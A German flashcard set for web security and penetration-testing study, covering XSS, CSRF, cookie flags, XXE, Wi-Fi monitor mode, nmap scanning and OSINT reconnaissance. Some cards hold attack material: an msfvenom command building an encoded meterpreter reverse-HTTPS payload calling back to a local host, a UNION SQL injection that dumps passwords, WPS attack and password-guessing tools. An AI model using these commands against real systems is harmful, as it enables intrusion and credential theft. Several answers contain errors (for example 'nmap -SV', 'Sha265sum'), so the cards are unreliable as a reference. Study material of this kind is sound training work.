01-Broken Access Control Flashcards

1
Q

Welche Zugriffskontrollen werden über Access Control umgesetzt?

A

Das Benutzer nicht ausserhalb der ihnen zugewiesenen Rechte handeln können

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Was meint man mit Cryptographic Failure?

A

Alle Fehler die zu einer Offenlegung der sensiblen Daten(Passwort, Kreditkarte. Gesundheitsdaten etc.) führen können.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Was ist eine Reflected XSS-Schwachstelle?

A

Wenn der Übertragungsparameter in einem HTTP Request einer Webanwendung ungefiltert wieder in die Antwort HTML-Seite eingebunden wird.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Was ist ein Persistent XSS?

A

Ähnlich wie Reflected führt einen Javascript Angriff in der Webanwendung, um Zugriff Informationen vom jeweiligen Benutzer zu erhalten

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Was ist ein DOM-Based XSS?

A

Einbinden von Javascript-Code in einer Webseite. Fehler in einem Javascript der Anwendung

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Was ist ein Request Forgery?

A

Heimliche,böswillige Ausführen von HTTP Requests.
Keine Abmeldung bei E-Banking, dann geht der Benutzer auf eine fake Webseite und ein Script führt ein HTTP Request auf die Online Banking mit 2000CHF Überweisungen, da Session in Cookie gespeichert ist akzeptieret die Bank den Request

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

HTTP Cookies und Zusatz Optionen?

A

Werden bei jeder Anfrage an dem Webserver übertragen.

HTTP Response Header (Server) Cookie setzten- Set-Cookie:SessionID:6755

HTTP Request Header (Client) Browser seitenabruf-Cookie:SessionID:6755

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Set-Cookie Optionen

A

Path- für welchen Pfad

Secure- Übermittlung nur bei HTTPS-Verbindung

HttpOnly- verhindert das JavaScript auf das Cookie zugreifen kann.

SameSite- verhindert das Cookie mit seitenübergreifende Anfrage sendet. Bietet Schutz gegen XSS-Request-Forgery-Angriffe

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

HTTP-Response Header Optionen

A

Location- Antwort des Webserver“3xx“ Antwort

Server- Info Webserver

Set-Cookie- Cookie der Domain geschrieben

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Spidering

A

Sammlung Unterverzeichnis, Formulare, Versand E-Mails, Info in Cookie

Tools: Webscarab,DirBuster, BurpSuite

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Wie kann man Übergabedaten manipulieren?

A

Form Fiels

Http-Cookies

Http-Header(Referer, Browser)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Http Referer Header

A

Nachprüfungen, ob ein Benutzer von bestimmte Ressource kommt.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Was ist eine SOAP Injection XML External Entity (XEE)

A

Greift Applikationen an die XML Parsen. Eine External Entity erlaubt den Zugriff auf lokale oder entfernte Daten über einen deklarierten System-Identifier.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

WLAN-Adapter Monitoremode?

A

Airmon-ng start wlan0
Airmon-ng check kill

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Wireshark Filter um Mobile-Geräte Probes zu erkennen?

A

wlan.fc.type_subtype == 0x04

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Wlan-Karte in Monitoremode bringen?

A

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Wlan Scanning
Airodump-ng?

A

airodump-ng wlan0

18
Q

Nmap Befehl findet Schwachstellen finden?

A

nmap —script vuln

19
Q

Nmpa öffentliche Skripte nach CVE?

A

nmap —script vulners

20
Q

Wörtliste erstellen für Wlan-Hacking?

A

Cewl und Chrunch

21
Q

Passwort hashen mit sha256?

A

echo -n “passwort” | sha256sum

22
Q

Wlan Hacking befehl “wash”

A

WPS Schwächen finden
wash -i wlan0

wash -i wlan0 -C | grep SSID

23
Q

OSINT Personensdetails der Angstellten finden?

A

Emailcrwalr.com

24
Q

Eingesetzte CMS prüfen?

A

whatcms.org

25
Q

SQL-Injection, Alle Benutzer mit Passwort ausgeben?

A

Select book, autor from bibel UNION select username,password from userdata —

26
Q

DNS-Abfragen nur Ergebnisse?

A

dig +short -t any test.ch

27
Q

Befehl für halboffene Ports scannen?

A

-sS(TCP-SYN-Scan)

28
Q

Was verhindert ein httpOnly flag beim Cookie?

A

Verhindert das Cookie durch Scripte ausgelesen werden können.

29
Q

Was ist ein secure Cookie?

A

Cookie werden verschlüsselt mittels Https übermittelt.

30
Q

Exploits finden mit welchem Kali Tool?

A

searchsploit

31
Q

Msfvenom encoder Befehl erstellen

A

msfvenom -p windows/meterpreter/reverse_https
LHOST=192.168.101.34 LPORT=443 -e x86/shikata_ga_nai -i 10 -f exe > bad.exe

32
Q

Einfacher Nmap Befehl für offene Ports, Versionen und Schwachstellen

A

nmap -SV -A 192.168.201.1

33
Q

Tastaturlayaout einstellen Befehl?

A

dpkg-reconfigure keyboard-configuration

34
Q

Zeitzone einstellen Code

A

dpkg-reconfigure tzdata

35
Q

Mit was kann man Hosts auskundschaften?

A

Whois?
Dnslytics.com
Dnsdumpster.com
Netcraft.com
Traceroute
Dns recon

36
Q

Auskundschaften E-mail?

A

Haveibeenpwned
Azurewebsites.net

37
Q

Auskundschaften Person?

A

Yasni.de
Moneyhouse.ch
Autonummer abfragen

38
Q

Wireshark filter Monitore mode PROBES?

A

wlan.fc.type_subtype ==0x04

39
Q

Wireshark Filter Monitor mode BEACONS?

A

wlan.fc.type_subtype ==0x08

40
Q

Hashwert von Datei prüfen?

A

Sha265sum password.sh

41
Q

Passwort testing bei Onlinedienst

A

Hydra, Medusa und Ncrack

42
Q

Auskundschaften Website?

A
  • Robots.txt
  • Security Header Einstellungen prüfen
  • Cookie Einstellungen
  • Banner
  • Internetarchiv